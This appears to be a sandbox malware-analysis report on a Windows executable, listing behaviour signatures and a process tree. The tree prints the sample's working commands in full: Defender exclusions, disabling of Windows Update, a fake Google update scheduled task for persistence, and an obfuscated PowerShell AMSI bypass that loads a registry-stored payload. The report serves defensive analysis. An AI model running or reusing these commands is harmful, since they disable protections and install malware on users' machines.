Analysis
-
max time kernel
268s -
max time network
178s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
06-05-2022 00:29
General
-
Target
a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe
-
Size
2.2MB
-
MD5
258534f009540a1b82120c82cd9e697e
-
SHA1
3243d37c9b3424f261663c7d8b4f8781c3925c8e
-
SHA256
a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505
-
SHA512
d96a291402a3e0d4a8b92d73d67c8b7a80b868bed14dcb207c6999c32357a469860876cebe77ac3e144aabef6b3936d54cb8d64ed09ec558471fee0a8cf51945
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 3 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6be17f06-4b09-4b3d-a747-db416ec26d29}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe"C:\Users\Admin\AppData\Local\Temp\a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a9fb78c283399043d249c10638305c95673c5319c534d84a66407fefdee1d505.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
-
C:\Windows\system32\sc.exesc stop bits5⤵
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe4⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeC:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHIAegBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABtAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AawBrAG8AIwA+AA=="8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\sc.exesc stop wuauserv8⤵
-
C:\Windows\system32\sc.exesc stop bits8⤵
-
C:\Windows\system32\sc.exesc stop dosvc8⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc8⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f8⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 07⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 08⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "rvmaottuvrwq"8⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2348 -s 7922⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3896 -s 8522⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3896 -s 8282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kqEuWFWVCYql{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OyltkQGHjHZpwd,[Parameter(Position=1)][Type]$VWuuWjVyTS)$pwvlkypHxkU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$pwvlkypHxkU.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$OyltkQGHjHZpwd).SetImplementationFlags('Runtime,Managed');$pwvlkypHxkU.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$VWuuWjVyTS,$OyltkQGHjHZpwd).SetImplementationFlags('Runtime,Managed');Write-Output $pwvlkypHxkU.CreateType();}$XjzpjHeaTOjjo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$cTtqDbeaeqSxSU=$XjzpjHeaTOjjo.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$doRMDpwNVyfXzWZHzig=kqEuWFWVCYql @([String])([IntPtr]);$fHUeBUfTLZDPzakbXTQWXS=kqEuWFWVCYql @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EyNgFYbxaDx=$XjzpjHeaTOjjo.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$PYBbtiVlzRAeWk=$cTtqDbeaeqSxSU.Invoke($Null,@([Object]$EyNgFYbxaDx,[Object]('Load'+'LibraryA')));$QLrkQSWwraDpOtdaZ=$cTtqDbeaeqSxSU.Invoke($Null,@([Object]$EyNgFYbxaDx,[Object]('Vir'+'tual'+'Pro'+'tect')));$sRTggbV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PYBbtiVlzRAeWk,$doRMDpwNVyfXzWZHzig).Invoke('a'+'m'+'si.dll');$erXPHbcVGbsyuRqJV=$cTtqDbeaeqSxSU.Invoke($Null,@([Object]$sRTggbV,[Object]('Ams'+'iSc'+'an'+'Buffer')));$qrIGqOkInG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QLrkQSWwraDpOtdaZ,$fHUeBUfTLZDPzakbXTQWXS).Invoke($erXPHbcVGbsyuRqJV,[uint32]8,4,[ref]$qrIGqOkInG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$erXPHbcVGbsyuRqJV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QLrkQSWwraDpOtdaZ,$fHUeBUfTLZDPzakbXTQWXS).Invoke($erXPHbcVGbsyuRqJV,[uint32]8,0x20,[ref]$qrIGqOkInG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
